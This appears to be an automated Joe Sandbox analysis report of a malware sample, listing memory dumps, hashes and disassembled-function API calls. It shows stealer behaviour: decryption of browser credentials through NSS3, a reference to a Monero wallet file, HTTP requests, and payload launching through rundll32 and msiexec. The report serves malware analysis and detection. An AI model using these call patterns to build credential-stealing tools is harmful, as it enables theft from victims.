Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17110b993b0ffae3f6e91c3ff687464b96569bbdd2cdb6316915728351c7a308
Instruction ID: f307c4c505bfb937b4ad8d3c92c62b41587c59c22ad91a92b2a2b070fa9957b0
Opcode Fuzzy Hash: 17110b993b0ffae3f6e91c3ff687464b96569bbdd2cdb6316915728351c7a308
Instruction Fuzzy Hash: 2B41C0F260C2009FE755AE18EC817AEB7E5EF54310F06492DE6C9C7340E6359850C787

Function 00E76C7C Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 805322cb7188ccbcce47fdf7fb791c0307554a816f13fd1428ffa66bebbfb31b
Instruction ID: f5776d9d3a856a3cea7c2e91e20c392ff72e8eb4ecacc58e8ba3dd27a079546b
Opcode Fuzzy Hash: 805322cb7188ccbcce47fdf7fb791c0307554a816f13fd1428ffa66bebbfb31b
Instruction Fuzzy Hash: 844142F3A192289FE351ED2CDC8976BB3D8EF48210F16893CEAD4D7344E934980542C6

Function 00B99750 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 00B8C990 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 384filestringCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(00000000), ref: 00B8C9A5

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Part of subcall function 00B9A920: lstrcpy.KERNEL32(00000000,?), ref: 00B9A972
Part of subcall function 00B9A920: lstrcat.KERNEL32(00000000), ref: 00B9A982

Part of subcall function 00B9A8A0: lstrcpy.KERNEL32(?,00BA0E17), ref: 00B9A905

Part of subcall function 00B9A9B0: lstrlen.KERNEL32(?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B9A9C5
Part of subcall function 00B9A9B0: lstrcpy.KERNEL32(00000000), ref: 00B9AA04
Part of subcall function 00B9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B9AA12

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0133D540,00000000,?,00BA144C,00000000,?,?), ref: 00B8CA6C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00B8CA89
GetFileSize.KERNEL32(00000000,00000000), ref: 00B8CA95
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B8CAA8
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00B8CAD9
StrStrA.SHLWAPI(?,0133D4E0,00BA0B52), ref: 00B8CAF7
StrStrA.SHLWAPI(00000000,0133D588), ref: 00B8CB1E
StrStrA.SHLWAPI(?,0133D700,00000000,?,00BA1458,00000000,?,00000000,00000000,?,01339090,00000000,?,00BA1454,00000000,?), ref: 00B8CCA2
StrStrA.SHLWAPI(00000000,0133D880), ref: 00B8CCB9

Part of subcall function 00B8C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00B8C871
Part of subcall function 00B8C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00B8C87C
Part of subcall function 00B8C820: PK11_GetInternalKeySlot.NSS3 ref: 00B8C88A
Part of subcall function 00B8C820: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 00B8C8A5
Part of subcall function 00B8C820: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 00B8C8EB
Part of subcall function 00B8C820: PK11_FreeSlot.NSS3(?), ref: 00B8C961

StrStrA.SHLWAPI(?,0133D880,00000000,?,00BA145C,00000000,?,00000000,013391F0), ref: 00B8CD5A
StrStrA.SHLWAPI(00000000,01338F30), ref: 00B8CD71

Part of subcall function 00B8C820: lstrcat.KERNEL32(?,00BA0B46), ref: 00B8C943
Part of subcall function 00B8C820: lstrcat.KERNEL32(?,00BA0B47), ref: 00B8C957
Part of subcall function 00B8C820: lstrcat.KERNEL32(?,00BA0B4E), ref: 00B8C978

lstrlen.KERNEL32(00000000), ref: 00B8CE44
CloseHandle.KERNEL32(00000000), ref: 00B8CE9C
NSS_Shutdown.NSS3 ref: 00B8CEAA

Strings

, xrefs: 00B8C9C6

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeString
String ID:
API String ID: 1052888304-3916222277
Opcode ID: dd3645aa951fd6be04302091b2a85d6df6aae2997e660f808b917e746d2a0a71
Instruction ID: f2563b3570fcd5c39ab7040ea265c71f574c8ffce2d7cc4651a83246e822055f
Opcode Fuzzy Hash: dd3645aa951fd6be04302091b2a85d6df6aae2997e660f808b917e746d2a0a71
Instruction Fuzzy Hash: BDE1EE71910119ABDF15EBA4DC95FEEB7B8BF14304F4041A9F106B6191EF306A4ACBA2

Function 00B99010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00B9906C

Strings

image/jpeg, xrefs: 00B99136

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID: image/jpeg
API String ID: 2244384528-3785015651
Opcode ID: eb5287c1831fa04e9e4e079f84df1f0db6e1360d59288735f9ecfe1b21916d4f
Instruction ID: e7fe93204d40a44c5a53ea97967432f500b9fa4a71c312c252bfebf9ecb2f58c
Opcode Fuzzy Hash: eb5287c1831fa04e9e4e079f84df1f0db6e1360d59288735f9ecfe1b21916d4f
Instruction Fuzzy Hash: 4571DAB591020AABDB04EFE8DC89FEEB7B9BF48704F108558F515E7290DB34A905CB61

Function 00B917A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 00B917C5
ExitProcess.KERNEL32 ref: 00B917D1

Strings

block, xrefs: 00B917B7

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: block
API String ID: 621844428-2199623458
Opcode ID: 856d567e619827e4f6e1a56ccbe2d2ec860525f3f060332454eee02335a21526
Instruction ID: 48c1a7f184a22b5019e65cd1ccde5a321c8eb2f7bfcf79dfe767165c62b617b4
Opcode Fuzzy Hash: 856d567e619827e4f6e1a56ccbe2d2ec860525f3f060332454eee02335a21526
Instruction Fuzzy Hash: AA514BB5A1420AEBCF04DFA8D994ABE77F5FF44704F1044A8E806A7351D770E942EB62

Function 00B92E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON

Download Yara Rule

APIs

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

ShellExecuteEx.SHELL32(0000003C), ref: 00B931C5
ShellExecuteEx.SHELL32(0000003C), ref: 00B9335D
ShellExecuteEx.SHELL32(0000003C), ref: 00B934EA

Strings

.msi, xrefs: 00B93398
/passive, xrefs: 00B9345B
C:\Windows\system32\msiexec.exe, xrefs: 00B934BF
"" , xrefs: 00B9309A
C:\Windows\system32\rundll32.exe, xrefs: 00B93332
/i ", xrefs: 00B933E4
.dll, xrefs: 00B931E5
<, xrefs: 00B93490

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: ExecuteShell$lstrcpy
String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
API String ID: 2507796910-3625054190
Opcode ID: 9f0a51f9e2d2779cea33485dcca831e0caaa6f9700fb2292626aedad07039161
Instruction ID: 944ae7afb1c986f91d85942787118d9ce2c2855508a9d3e33a16e621ce6d3504
Opcode Fuzzy Hash: 9f0a51f9e2d2779cea33485dcca831e0caaa6f9700fb2292626aedad07039161
Instruction Fuzzy Hash: 4412BB718101189ADF19FBA0DC92FEEB7B8AF15300F5041B9E50676191EF746B4ACFA2

Function 00B952C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B9A7E6

Part of subcall function 00B86280: InternetOpenA.WININET(00BA0DFE,00000001,00000000,00000000,00000000), ref: 00B862E1
Part of subcall function 00B86280: StrCmpCA.SHLWAPI(?,0133E898), ref: 00B86303
Part of subcall function 00B86280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B86335
Part of subcall function 00B86280: HttpOpenRequestA.WININET(00000000,GET,?,0133E010,00000000,00000000,00400100,00000000), ref: 00B86385
Part of subcall function 00B86280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00B863BF
Part of subcall function 00B86280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B863D1

Part of subcall function 00B9A8A0: lstrcpy.KERNEL32(?,00BA0E17), ref: 00B9A905

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B95318
lstrlen.KERNEL32(00000000), ref: 00B9532F

Part of subcall function 00B98E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B98E52

StrStrA.SHLWAPI(00000000,00000000), ref: 00B95364
lstrlen.KERNEL32(00000000), ref: 00B95383
lstrlen.KERNEL32(00000000), ref: 00B953AE

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Strings

ERROR, xrefs: 00B95432
ERROR, xrefs: 00B954A9
ERROR, xrefs: 00B9546F
ERROR, xrefs: 00B9530A
ERROR, xrefs: 00B953B9

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
